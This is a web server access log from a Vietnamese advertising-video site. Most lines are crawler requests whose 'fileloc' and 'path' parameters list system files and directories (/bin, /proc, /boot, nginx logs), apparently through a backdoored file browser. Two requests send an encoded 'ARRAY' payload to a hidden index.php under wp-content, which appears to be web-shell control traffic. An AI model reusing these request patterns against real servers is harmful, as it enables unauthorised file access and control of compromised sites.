216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fapparmor%2Fprofile-load&path=%2F%2Flib%2Fapparmor HTTP/1.0" 200 3673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Ferror.log.25.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2838 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:32 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fmanpath&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fshim%2Fshimx64.efi.signed&path=%2F%2Flib%2Fshim HTTP/1.0" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fopenssh%2Fssh-sk-helper&path=%2F%2Flib%2Fopenssh HTTP/1.0" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.66.163 - - [05/Nov/2025:00:08:31 +0000] "GET /?products=1050311064 HTTP/1.0" 200 25604 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.182 - - [05/Nov/2025:00:08:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Ffastpanel-proxy.access.log.39.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.1 - - [05/Nov/2025:00:08:31 +0000] "GET /?products=1413183738 HTTP/1.0" 200 27203 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fdovecot%2Fdict&path=%2F%2Flib%2Fdovecot HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fshim%2Fshimx64.efi.dualsigned&path=%2F%2Flib%2Fshim HTTP/1.0" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fdh_bash-completion&path=%2F%2Fbin HTTP/1.0" 200 3905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F9 HTTP/1.0" 200 4704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fos-release&path=%2F%2Flib HTTP/1.0" 200 3031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsystemd-socket-activate&path=%2F%2Fbin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fpslog&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:33 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fdev%2Fmqueue HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:08:34 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 12115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:08:37 +0000] "GET /q-~252rAG9ymxZsYif9HiKN2QcSKsMVIiouw34457/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 12115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:08:41 +0000] "GET /q-~100FIvov4xDdGeQWHPuIpem38RnbccaCV46687/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [05/Nov/2025:00:08:42 +0000] "GET /q-~93phxp4TTL3qHLioUOBnOijwOTKfw2RG12468 HTTP/1.0" 200 4576 "https://lamphimquangcao.net/sitemap502.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
217.113.194.35 - - [05/Nov/2025:00:08:42 +0000] "GET /our-works/tvc-kamila/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.114 - - [05/Nov/2025:00:08:43 +0000] "GET /q-~155VUTonRRJcK6fL9LQNFspSvEZ0AtxOB24162/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [05/Nov/2025:00:06:25 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343738352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330313138352q6162616139333933343266383831633464656134636534386232353133353263222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.114 - - [05/Nov/2025:00:08:47 +0000] "GET /q-~237z93TPCRYtJuhnxwTBsc6dPVAmwqBYy15274/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:08:49 +0000] "GET /q-~235Rsxi6HCAQnPZHWzwONPgMw0p1iAbVq44680/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:08:53 +0000] "GET /q-~72WgQo0X8YvnGdlmtog7ju0IaMuJuTAa35995/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:08:56 +0000] "GET /q-~265UGRlQF9rLje52iqrcWOFaWxUCfIvAn33052/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:09:00 +0000] "GET /q-~100FIvov4xDdGeQWHPuIpem38RnbccaCV46687/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
217.113.194.209 - - [05/Nov/2025:00:09:02 +0000] "GET /our-works/tvc-bia-hello/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4576 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.114 - - [05/Nov/2025:00:09:03 +0000] "GET /q-~252rAG9ymxZsYif9HiKN2QcSKsMVIiouw34457/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:09:06 +0000] "GET /q-~155VUTonRRJcK6fL9LQNFspSvEZ0AtxOB24162/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [05/Nov/2025:00:06:47 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343830372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330313230372q3836363931656535353262613063333238666363633730333962613662386663222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.114 - - [05/Nov/2025:00:09:11 +0000] "GET /q-~237z93TPCRYtJuhnxwTBsc6dPVAmwqBYy15274/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-blog-header.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:09:14 +0000] "GET /q-~237z93TPCRYtJuhnxwTBsc6dPVAmwqBYy15274/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Fbinfmt.d HTTP/1.0" 200 2875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fmkdir&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fvar%2Fupload HTTP/1.0" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_wr_mode&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fhostnamectl&path=%2F%2Fbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_write_x&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fnetworkctl&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fltrace&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Funlink&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fbin%2Fgit-upload-archive&path=%2F%2Fbin HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F231%2Fmap_files HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_stpg&path=%2F%2Fbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsbsign&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Flzegrep&path=%2F%2Fbin HTTP/1.0" 200 5413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Fsos HTTP/1.0" 200 3330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fnetkit-ftp&path=%2F%2Fbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:09:18 +0000] "GET /q-~235Rsxi6HCAQnPZHWzwONPgMw0p1iAbVq44680/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fbootctl&path=%2F%2Fbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Finit.d HTTP/1.0" 200 4668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_vpd&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsystemd-escape&path=%2F%2Fbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Fsystemd HTTP/1.0" 200 3591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Flnstat&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Funmkinitramfs&path=%2F%2Fbin HTTP/1.0" 200 4372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fmmcli&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_dd&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fpyjwt3&path=%2F%2Fbin HTTP/1.0" 200 3030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_raw&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fbyobu-enable-prompt&path=%2F%2Fbin HTTP/1.0" 200 3623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Flsblk&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:19 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fbin%2Fmysql_migrate_keyring&path=%2F%2Fbin HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F1121%2Fmap_files HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F643%2Fmap_files HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsos-collector&path=%2F%2Fbin HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_rep_zones&path=%2F%2Fbin HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fefibootmgr&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Funlz4&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Ftaskset&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_inq&path=%2F%2Fbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_persist&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fbyobu-select-session&path=%2F%2Fbin HTTP/1.0" 200 3378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fboot%2Fvmlinuz-5.4.0-216-generic&path=%2F%2Fboot HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Frun%2FNetworkManager HTTP/1.0" 200 3138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_sat_identify&path=%2F%2Fbin HTTP/1.0" 200 2818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsgp_dd&path=%2F%2Fbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fgdbus&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:22 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Frsyslog.d HTTP/1.0" 200 3257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsdiff&path=%2F%2Fbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.66.163 - - [05/Nov/2025:00:09:21 +0000] "GET /?products=1413474202 HTTP/1.0" 200 26498 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [05/Nov/2025:00:09:21 +0000] "GET /?products=663396220 HTTP/1.0" 200 24926 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.182 - - [05/Nov/2025:00:09:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmecab%2Fmecab-cost-train&path=%2F%2Flib%2Fmecab HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:09:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_sat_phy_event&path=%2F%2Fbin HTTP/1.0" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
